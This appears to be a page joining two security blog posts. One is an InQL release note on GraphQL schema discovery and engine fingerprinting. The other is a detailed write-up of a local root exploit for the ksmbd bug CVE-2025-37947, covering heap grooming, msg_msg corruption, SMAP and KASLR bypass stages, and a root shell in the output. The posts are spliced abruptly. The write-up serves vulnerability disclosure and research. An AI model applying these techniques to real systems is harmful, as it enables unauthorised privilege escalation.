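  requiredArgs: string[];
  suggestions: string[];
}

// Patterns for the message shapes quoted above (single or double quotes).
const FIELD_NOT_FOUND = /Field ['"](\w+)['"] not found on type ['"](\w+)['"]/;
const ARG_REQUIRED = /Argument ['"](\w+)['"] is required/;
const DID_YOU_MEAN = /Did you mean (.+?)\?/;
const QUOTED_NAME = /['"](\w+)['"]/;

// Collect every match of `pattern` in `text` using a fresh global regex.
function allMatches(pattern: RegExp, text: string): RegExpExecArray[] {
  const re = new RegExp(pattern.source, "g");
  const out: RegExpExecArray[] = [];
  let m: RegExpExecArray | null;
  while ((m = re.exec(text)) !== null) out.push(m);
  return out;
}

function parseErrors(messages: string[]): Feedback {
  const fb: Feedback = { missingFields: [], requiredArgs: [], suggestions: [] };
  for (const msg of messages) {
    for (const m of allMatches(FIELD_NOT_FOUND, msg)) fb.missingFields.push(m[1]);
    for (const m of allMatches(ARG_REQUIRED, msg)) fb.requiredArgs.push(m[1]);
    for (const m of allMatches(DID_YOU_MEAN, msg)) {
      // A suggestion may list several names: Did you mean 'a' or 'b'?
      for (const q of allMatches(QUOTED_NAME, m[1])) fb.suggestions.push(q[1]);
    }
  }
  return fb;
}

const feedback = parseErrors([
  "Argument 'contribution' is required",
  "Field 'bugs' not found on type 'inql'",
  "Did you mean 'openPR'?",
]);
console.log(buildProbe(["bugs", "openPR"])); // query { bugs openPR }
console.log(JSON.stringify(feedback));
// {"missingFields":["bugs"],"requiredArgs":["contribution"],"suggestions":["openPR"]}
```

Suggestions feed back into the next round of probes, which is why they shorten discovery so much compared with blind wordlist guessing.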

Be aware that the scan can take time. Depending on the schema’s complexity, server rate-limiting, and the wordlist size, a full reconstruction can take anywhere from a few minutes to several hours. We recommend visiting the InQL settings tab to properly set up the scan for your specific target.

The new version of InQL is now able to fingerprint the GraphQL engine used by the back-end server. Each GraphQL engine implements slightly different security protections and insecure defaults, opening the door to unique, engine-specific attack vectors.

The fingerprinted engine can be looked up in the GraphQL Threat Matrix by Nick Aleks. The matrix is a fantastic resource for confirming which implementation may be vulnerable to specific GraphQL threats.

How It Works

Similar to the graphw00f CLI tool, InQL sends a series of specific GraphQL queries to the target server and observes how it responds. It can differentiate the specific engines by analyzing the unique nuances in their error messages and responses.

For example, for the following query:

query @deprecated {

__typename

}

An Apollo server typically responds with the error message Directive \"@deprecated\" may not be used on QUERY. A GraphQL Ruby server, however, responds with the message '@deprecated' can't be applied to queries.
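A single probe like this boils down to a lookup table of error-message signatures. The sketch below is hypothetical (not InQL's implementation) and encodes only the two responses quoted above. It matches the error messages after the JSON response has been decoded, so the escaped quotes become plain quotes. A real fingerprinter chains many such probes before settling on an engine.

```typescript
// Hypothetical signature table for the `query @deprecated { __typename }` probe.
// Only the two responses quoted above are encoded; a real fingerprinter chains many probes.
interface Signature {
  engine: string;
  pattern: RegExp;
}

const PROBE_QUERY = "query @deprecated { __typename }";

const SIGNATURES: Signature[] = [
  { engine: "Apollo", pattern: /Directive "@deprecated" may not be used on QUERY/ },
  { engine: "GraphQL Ruby", pattern: /'@deprecated' can't be applied to queries/ },
];

// JSON body for a standard GraphQL-over-HTTP POST request carrying the probe.
function probeBody(): string {
  return JSON.stringify({ query: PROBE_QUERY });
}

// Match the (already JSON-decoded) error messages against known signatures.
function fingerprint(errorMessages: string[]): string | null {
  for (const sig of SIGNATURES) {
    if (errorMessages.some((msg) => sig.pattern.test(msg))) return sig.engine;
  }
  return null;
}

console.log(probeBody()); // {"query":"query @deprecated { __typename }"}
console.log(fingerprint(['Directive "@deprecated" may not be used on QUERY.'])); // Apollo
console.log(fingerprint(["'@deprecated' can't be applied to queries"])); // GraphQL Ruby
```

Returning null for unknown messages lets a caller fall through to the next probe instead of guessing.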

When InQL successfully fingerprints the engine, it displays details about its implementation right in the UI, based on data from the GraphQL Threat Matrix.

While previous InQL versions were great for analyzing schemas, finding circular references, and identifying points-of-interest, actually crafting a valid query could be frustrating. The tool didn’t handle variables, forcing you to fill them in manually. The new release finally fixes that pain point.

Now, when you use “Send to Repeater” or “Send to Intruder” on a query that requires variables (like a search argument of type String), InQL will automatically populate the request with placeholder values. This simple change significantly improves the speed and flow of testing GraphQL APIs.

Here are the default values InQL will now use:

"String" -> "exampleString"

"Int" -> 42

"Float" -> 3.14

"Boolean" -> true

"ID" -> "123"

ENUM -> First value
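A placeholder generator that follows these defaults might look like the sketch below. It is hypothetical: the scalar and enum rules come from the list above, while stripping the non-null marker (!), wrapping list types in a one-element array, and returning null for input objects or custom scalars are assumptions about behavior the release notes do not describe.

```typescript
// Hypothetical placeholder generator. Scalar and enum rules follow the list above;
// non-null stripping, list wrapping, and the null fallback are assumptions.
type Json = string | number | boolean | null | Json[];

const SCALAR_DEFAULTS: Record<string, Json> = {
  String: "exampleString",
  Int: 42,
  Float: 3.14,
  Boolean: true,
  ID: "123",
};

function placeholder(typeRef: string, enums: Record<string, string[]>): Json {
  let t = typeRef.trim();
  if (t.charAt(t.length - 1) === "!") t = t.slice(0, -1); // non-null marker
  if (t.charAt(0) === "[" && t.charAt(t.length - 1) === "]") {
    return [placeholder(t.slice(1, -1), enums)]; // one-element list
  }
  if (Object.prototype.hasOwnProperty.call(SCALAR_DEFAULTS, t)) return SCALAR_DEFAULTS[t];
  const values = enums[t];
  if (values && values.length > 0) return values[0]; // ENUM -> first value
  return null; // input objects and custom scalars: left for the tester to fill in
}

// Build the "variables" object for an operation from its variable definitions.
function buildVariables(
  defs: Record<string, string>,
  enums: Record<string, string[]> = {}
): Record<string, Json> {
  const vars: Record<string, Json> = {};
  for (const name of Object.keys(defs)) vars[name] = placeholder(defs[name], enums);
  return vars;
}

const vars = buildVariables(
  { search: "String!", limit: "Int", episodes: "[Episode!]!" },
  { Episode: ["NEWHOPE", "EMPIRE", "JEDI"] }
);
console.log(JSON.stringify(vars));
// {"search":"exampleString","limit":42,"episodes":["NEWHOPE"]}
```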

We also implemented various usability and performance improvements. These changes include:

InQL is an open-source project, and we welcome every contribution. We want to take this opportunity to thank the community for all the support, bug reports, and feedback we’ve received so far!

With this new release, we’re excited to announce a new initiative to reward contributors. To show our appreciation, we’ll be sending exclusive Doyensec swag and/or gift cards to community members who fix issues or create new features.

To make contributing easy, make sure to read the project’s README.md file and review the existing issues on GitHub. We encourage you to start with tasks labeled Good First Issue or Help Wanted.

Some of the good first issues we would like to see your contribution for:

If you have an idea for a new feature or have found a bug, please open a new issue to discuss it before you start building. This helps everyone get on the same page.

We can’t wait to see your pull requests!

As we’ve mentioned, we are extremely excited about this new release and the direction InQL is heading. We hope to see more contributions from the ever-growing cybersecurity community and can’t wait to see what the future brings!

Remember to update to the latest version and check out our InQL page on GitHub.

Happy Hacking!

This is the last of our posts about ksmbd. For the previous posts, see part 1 and part 2.

Considering all discovered bugs and proof-of-concept exploits we reported, we had to select some suitable candidates for exploitation. In particular, we wanted to use something reported more recently to avoid downgrading our working environment.

We first experimented with several use-after-free (UAF) bugs, since this class of bugs has a reputation for almost always being exploitable, as proven in numerous articles. However, many of them required race conditions and specific timing, so we postponed them in favor of bugs with more reliable or deterministic exploitation paths.

Then there were bugs that depended on factors outside user control, or that had peculiar behavior. Let’s first look at CVE-2025-22041, which we initially intended to use. Due to missing locking, it’s possible to invoke the ksmbd_free_user function twice:

void ksmbd_free_user(struct ksmbd_user *user)
{
	ksmbd_ipc_logout_request(user->name, user->flags);
	kfree(user->name);
	kfree(user->passkey);
	kfree(user);
}

In this double-free scenario, an attacker has to replace user->name with another object so that it gets freed the second time. The problem is that the kmalloc cache used for user->name depends on the length of the username: if the name (including its NUL terminator) is slightly longer than 8 bytes, it lands in kmalloc-16 instead of kmalloc-8, which means different exploitation techniques are required depending on the username length.
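The size-class dependency is simple arithmetic. The sketch below assumes that the username is duplicated with kstrdup() (so the allocation is strlen + 1 bytes), that the name is ASCII, and that the kernel uses the generic SLUB kmalloc caches of a typical x86_64 build; kmallocCache and cacheForUsername are hypothetical helpers for illustration only.

```typescript
// Hypothetical helper: which generic kmalloc cache a kstrdup()'d username lands in.
// Assumptions: ASCII name (1 byte per char), allocation = strlen + 1 for the NUL,
// and the generic SLUB caches of a typical x86_64 kernel.
const KMALLOC_CACHES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192];

function kmallocCache(size: number): string {
  for (const cache of KMALLOC_CACHES) {
    if (size <= cache) {
      // /proc/slabinfo names caches of 1024 bytes and above "kmalloc-1k", etc.
      const label = cache >= 1024 ? cache / 1024 + "k" : String(cache);
      return "kmalloc-" + label;
    }
  }
  return "page allocator"; // beyond the largest SLUB kmalloc cache
}

function cacheForUsername(name: string): string {
  return kmallocCache(name.length + 1); // + 1 for the NUL terminator
}

console.log(cacheForUsername("user123")); // kmalloc-8 (8 bytes)
console.log(cacheForUsername("user1234")); // kmalloc-16 (9 bytes)
```

A single extra character in the username is enough to move the freed object into a different cache, and with it the set of objects usable for the replacement.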

Hence, we decided to take a look at CVE-2025-37947, which seemed promising from the start. We considered remote exploitation by combining the bug with an infoleak, but we lacked a primitive such as a writeleak, and we were not aware of any such bug having been reported in the last year. In any case, as mentioned, we restricted ourselves to bugs we had discovered.

This bug alone appeared to offer the capabilities we needed to bypass common mitigations (e.g., KASLR, SMAP, SMEP, and several Ubuntu kernel hardening options such as HARDENED_USERCOPY). Due to additional time constraints, we ended up focusing on local privilege escalation only. The exploit targets Ubuntu 22.04.5 LTS running 5.15.0-153-generic, the latest kernel that was still vulnerable at the time of writing.

The finding requires the streams_xattr module to be enabled in the vfs objects configuration option and can be triggered by an authenticated user. In addition, a writable share must be added to the default configuration as follows:

```ini
[share]
path = /share
vfs objects = streams_xattr
writeable = yes
```

Here is the vulnerable code, with a few unrelated lines removed that do not affect the bug’s logic:

```c
// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411
static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
				  size_t count)
{
	char *stream_buf = NULL, *wbuf;
	struct mnt_idmap *idmap = file_mnt_idmap(fp->filp);
	size_t size;
	ssize_t v_len;
	int err = 0;

	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
		    *pos, count);

	size = *pos + count;
	if (size > XATTR_SIZE_MAX) { // [1]
		size = XATTR_SIZE_MAX;
		count = (*pos + count) - XATTR_SIZE_MAX;
	}

	wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2]
	stream_buf = wbuf;

	memcpy(&stream_buf[*pos], buf, count); // [3]

	// .. snip

	if (err < 0)
		goto out;

	fp->filp->f_pos = *pos;
	err = 0;
out:
	kvfree(stream_buf);
	return err;
}
```

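The maximum size of an extended attribute value, XATTR_SIZE_MAX, is 65536 (0x10000) bytes, or 16 pages assuming the common page size of 0x1000 bytes. At [1], if the position plus the count exceeds this value, size is truncated to 0x10000, and that many bytes are allocated at [2]. However, count is not reduced to fit the buffer: it becomes the excess over XATTR_SIZE_MAX, while the copy at [3] still starts at *pos.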

Hence, we can set the position to 0x10000 and the count to 0x8, so that memcpy(&stream_buf[0x10000], buf, 8) writes 8 bytes of user-controlled data out of bounds at [3]. We can also shift the position to control the offset, for instance using 0x10010 to write 16 bytes past the end of the buffer. However, the number of bytes copied (count) then grows by 16 as well, so we end up copying 24 bytes and potentially corrupting more data. Depending on the alignment we can achieve, this is often undesirable.

To demonstrate that the vulnerability is reachable, we wrote a minimal proof of concept (PoC). This PoC only triggers the bug - it does not escalate privileges. Additionally, after changing the permissions of /proc/pagetypeinfo to be readable by an unprivileged user, it can be used to confirm the page order of the buffer allocation. The PoC authenticates with the smbuser/smbpassword credentials via the libsmb2 library and reuses the same socket to send the VFS stream data with user-controlled attributes.

Specifically, we set file_offset to 0x0000010018ULL and length_wr to 8, which makes count 0x10020 - 0x10000 = 32, so 32 bytes filled with 0xaa and 0xbb patterns are written for easy recognition.

If we run the PoC, print the allocation address, and break on memcpy, we can confirm the OOB write:

```
(gdb) c
Continuing.
ksmbd_vfs_stream_write+310 allocated: ffff8881056b0000

Thread 2 hit Breakpoint 2, 0xffffffffc06f4b39 in memcpy (size=32,
    q=0xffff8881031b68fc, p=0xffff8881056c0018)
    at /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h:191
warning: 191 /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h: No such file or directory
(gdb) x/2xg $rsi
0xffff8881031b68fc: 0xaaaaaaaaaaaaaaaa 0xbbbbbbbbbbbbbbbb
```

kvzalloc

On Linux, physical memory is managed in pages (usually 4KB), and the page allocator (buddy allocator) organizes them in power-of-two blocks called orders. Order 0 is a single page, order 1 is 2 contiguous pages, order 2 is 4 pages, and so on. This allows the kernel to efficiently allocate and merge contiguous page blocks.

Next, we need to look at exactly how the memory is allocated via kvzalloc. The function is just a wrapper around kvmalloc that returns zeroed memory, equivalent to the kvmalloc(size, GFP_KERNEL | __GFP_ZERO) call in the vulnerable code:

```c
// https://elixir.bootlin.com/linux/v5.15/source/include/linux/mm.h#L811
static inline void *kvzalloc(size_t size, gfp_t flags)
{
	return kvmalloc(size, flags | __GFP_ZERO);
}
```

Then the function calls kvmalloc_node, attempting to allocate physically contiguous memory using kmalloc, and if that fails, it falls back to vmalloc to obtain memory that only needs to be virtually contiguous. We were not trying to create memory pressure to exploit the latter allocation mechanism, so we can assume the function behaves like kmalloc().

Since Ubuntu uses the SLUB allocator by default, kmalloc continues with __kmalloc_node. It serves requests of up to KMALLOC_MAX_CACHE_SIZE (8192 bytes, i.e., order-1 allocations of two pages) from kmalloc_caches:

```c
// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4424
void *__kmalloc_node(size_t size, gfp_t flags, int node)
{
	struct kmem_cache *s;
	void *ret;

	if (unlikely(size > KMALLOC_MAX_CACHE_SIZE)) {
		ret = kmalloc_large_node(size, flags, node);

		trace_kmalloc_node(_RET_IP_, ret,
				   size, PAGE_SIZE << get_order(size),
				   flags, node);

		return ret;
	}

	s = kmalloc_slab(size, flags);

	if (unlikely(ZERO_OR_NULL_PTR(s)))
		return s;

	ret = slab_alloc_node(s, flags, node, _RET_IP_, size);

	trace_kmalloc_node(_RET_IP_, ret, size, s->size, flags, node);

	ret = kasan_kmalloc(s, ret, size, flags);

	return ret;
}
```

For anything larger, the Linux kernel gets pages directly using the page allocator:

```c
// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4407
#ifdef CONFIG_NUMA
static void *kmalloc_large_node(size_t size, gfp_t flags, int node)
{
	struct page *page;
	void *ptr = NULL;
	unsigned int order = get_order(size);

	flags |= __GFP_COMP;
	page = alloc_pages_node(node, flags, order);
	if (page) {
		ptr = page_address(page);
		mod_lruvec_page_state(page, NR_SLAB_UNRECLAIMABLE_B,
				      PAGE_SIZE << order);
	}

	return kmalloc_large_node_hook(ptr, size, flags);
}
```

So, since we have to request 16 pages, we are dealing with buddy allocator page shaping, and we aim to overflow memory that follows an order-4 allocation. The question is what we can place there and how to ensure proper positioning.

A key constraint is that memcpy() happens immediately after the allocation. This rules out spraying after allocation. Therefore, we must create a 16-page contiguous free space in memory in advance, so that kvzalloc() places stream_buf in that region. This way, the out-of-bounds write hits a controlled and useful target object.

There are various objects that could be allocated in kernel memory, but the most common ones use kmalloc caches. To find a good fit, we listed the slab caches by their order value, which indicates the page order used to allocate the slabs holding their objects:

```
$ for i in /sys/kernel/slab/*/order; do \
    sudo cat $i | tr -d '\n'; echo " -> $i"; \
  done | sort -rn | head
3 -> /sys/kernel/slab/UDPv6/order
3 -> /sys/kernel/slab/UDPLITEv6/order
3 -> /sys/kernel/slab/TCPv6/order
3 -> /sys/kernel/slab/TCP/order
3 -> /sys/kernel/slab/task_struct/order
3 -> /sys/kernel/slab/sighand_cache/order
3 -> /sys/kernel/slab/sgpool-64/order
3 -> /sys/kernel/slab/sgpool-128/order
3 -> /sys/kernel/slab/request_queue/order
3 -> /sys/kernel/slab/net_namespace/order
```

We see that slab caches use order-3 pages at most. Based on that, we chose kmalloc-cg-4k (not shown in the output), which we can easily spray. It is versatile for achieving various exploitation primitives, such as arbitrary read, arbitrary write, or in some cases even UAF.

After experimenting with order-3 page allocations and checking /proc/pagetypeinfo, we confirmed that there are 5 freelists per order and per zone, one for each migrate type. In our case, zone Normal is used, and GFP_KERNEL prefers the Unmovable migrate type, so we can ignore the others:

```
$ sudo cat /proc/pagetypeinfo
Page block order: 9
Pages per block: 512

Free pages count per migrate type at order     0    1    2    3    4    5    6    7    8    9   10
Node 0, zone DMA,    type Unmovable            0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA,    type Movable              0    0    0    0    0    0    0    0    0    1    3
Node 0, zone DMA,    type Reclaimable          0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA,    type HighAtomic           0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA,    type Isolate              0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA32,  type Unmovable            0    0    0    0    0    0    0    1    0    1    0
Node 0, zone DMA32,  type Movable              2    2    1    1    0    3    3    3    2    3  730
Node 0, zone DMA32,  type Reclaimable          0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA32,  type HighAtomic           0    0    0    0    0    0    0    0    0    0    0
Node 0, zone DMA32,  type Isolate              0    0    0    0    0    0    0    0    0    0    0
Node 0, zone Normal, type Unmovable           69   30    7    9    3    1   30   63   37   28   36
Node 0, zone Normal, type Movable             37    7    3    5    5    3    5    2    2    4 1022
Node 0, zone Normal, type Reclaimable          3    2    1    2    1    0    0    0    0    1    0
Node 0, zone Normal, type HighAtomic           0    0    0    0    0    0    0    0    0    0    0
Node 0, zone Normal, type Isolate              0    0    0    0    0    0    0    0    0    0    0

Number of blocks type      Unmovable     Movable Reclaimable  HighAtomic     Isolate
Node 0, zone DMA                   1           7           0           0           0
Node 0, zone DMA32                 2        1526           0           0           0
Node 0, zone Normal              182        2362          16           0           0
```

The output shows 9 free blocks of order 3 and 3 free blocks of order 4. By calling kvmalloc(0x10000, GFP_KERNEL | __GFP_ZERO), we can double-check that the number of free order-4 blocks is decremented. We can compare the state before and after the allocation:

| Normal, Unmovable (free blocks per order) | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
|---|---|---|---|---|---|---|---|---|---|---|---|
| Before allocation | 843 | 592 | 178 | 14 | 6 | 7 | 4 | 47 | 45 | 26 | 32 |
| After allocation | 843 | 592 | 178 | 14 | 5 | 7 | 4 | 47 | 45 | 26 | 32 |

When the allocator runs out of order-3 and order-4 blocks, it starts splitting higher-order blocks, such as order-5 ones, to satisfy new requests. This splitting is recursive: an order-5 block becomes two order-4 blocks, one of which is split again if needed.

In our scenario, once we exhaust all order-3 and order-4 freelist entries, the allocator pulls an order-5 block. One half is split to satisfy a lower-order allocation - our target order-3 object. The other half remains a free order-4 block and can later be used by kvzalloc for the stream_buf.

Even though this layout is not guaranteed, repeating this several times gives us a relatively high probability that the stream_buf allocation lands directly before an order-3 object, allowing us to corrupt that object's memory through the out-of-bounds write.







By allocating 1024 messages (msg_msg), with a message size of 4096 to fit into kmalloc-cg-4k, we obtained the following layout centered around stream_buf at 0xffff8881117b0000, where the red strip marks the target pages and the blue represents msg_msg objects:

When we zoomed in, we confirmed that it is indeed possible to place stream_buf before one of the messages:

Note that the probability of overwriting the victim object was significantly improved by receiving messages and creating holes. However, in a minority of cases - less than 10% in our results - the exploit failed.

This can occur when the write hits a different object, depending on the state of ksmbd or external processes. Unfortunately, with some probability, this can also result in a kernel panic.

After being able to trigger the OOB write, the local escalation becomes almost straightforward. We tried several approaches, such as corrupting the next pointer in a segmented msg_msg, described in detail here. However, using this method there was no easy way to obtain a KASLR leak, and we did not want to rely on side-channel attacks such as Retbleed. Therefore, we had to revisit our strategy.

The approach from the near-canonical write-up CVE-2021-22555: Turning \x00\x00 into 10000$ was the best fit. Because we overflowed into adjacent physical pages rather than into neighboring slab objects, we did not need a cross-cache attack to get around the separation of accounted (kmalloc-cg-*) caches, and the post-exploitation phase required only a few modifications.

First, we confirmed the allocation addresses with a BPF script to ensure that they are properly aligned.

```
$ sudo ./bpf-tracer.sh
...
$ grep 4048 out-4096.txt | egrep ".... total" -o | sort | uniq -c
511 0000 total
510 1000 total
511 2000 total
512 3000 total
511 4000 total
511 5000 total
511 6000 total
511 7000 total
513 8000 total
513 9000 total
513 a000 total
513 b000 total
513 c000 total
513 d000 total
513 e000 total
513 f000 total
```

Our choice to create a collision by overwriting the two least significant bytes with \x05\x00 was somewhat arbitrary. After that, we re-implemented all the stages, and we were even able to find similar ROP gadgets for stack pivoting.

We strongly recommend reading the original article, since it explains each step in detail and covers the information we do not repeat here.

With that in place, the exploit flow was the following:

1. Spray primary and secondary msg_msg objects in the kernel.
2. Trigger the out-of-bounds write past stream_buf, and overwrite the primary message's next pointer so two primary messages point to the same secondary message.
3. Use msgrcv(MSG_COPY) to find mismatched tags.
4. Abuse msg_msg.m_ts to leak kernel memory: craft the fake msg_msg so copy_msg returns more data than intended, and read adjacent headers and pointers to leak kernel heap addresses for mlist.next and mlist.prev.
5. With an sk_buff spray, rebuild the fake msg_msg with correct mlist.next and mlist.prev so it can be unlinked and freed normally.
6. Spray struct pipe_buffer objects so we can leak anon_pipe_buf_ops and compute the kernel base to bypass KASLR.
7. Forge a pipe_buf_operations structure by spraying sk_buff data a second time, with the release operation pointer pointing into crafted gadget sequences.

The final exploit is available here; it may require several attempts:

```
...
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[-] Error could not corrupt any primary message.
[ ] Attempt: 3
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 1a00
[+] real_idx: 1a08
[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff8f17c6e88000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff8f17d3bb5000
[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa3242700
[+] kbase_addr: ffffffffa2000000
[+] leaked kslide: 21000000
[+] STAGE 4: Kernel code execution
[*] Releasing pipe_buffer objects...
[*] Returned to userland
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux target22 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
```

Note that reliability could still be improved, because we did not try to find optimal values for the number of sprayed-and-freed objects used for corruption. We arrived at the values experimentally and obtained satisfactory results.

We successfully demonstrated the exploitability of the bug in ksmbd on the latest Ubuntu 22.04 LTS with the ksmbd service enabled and a writable share configured with streams_xattr, as described above. A full exploit achieving local root escalation was also developed.

A flaw in ksmbd_vfs_stream_write() allows out-of-bounds writes when pos exceeds XATTR_SIZE_MAX, enabling corruption of kernel objects in adjacent pages. Local exploitation can reliably escalate privileges. Remote exploitation is considerably more challenging: an attacker would be constrained to the code paths and objects exposed by ksmbd, and a successful remote attack would additionally require an information leak to defeat KASLR and make the heap grooming reliable.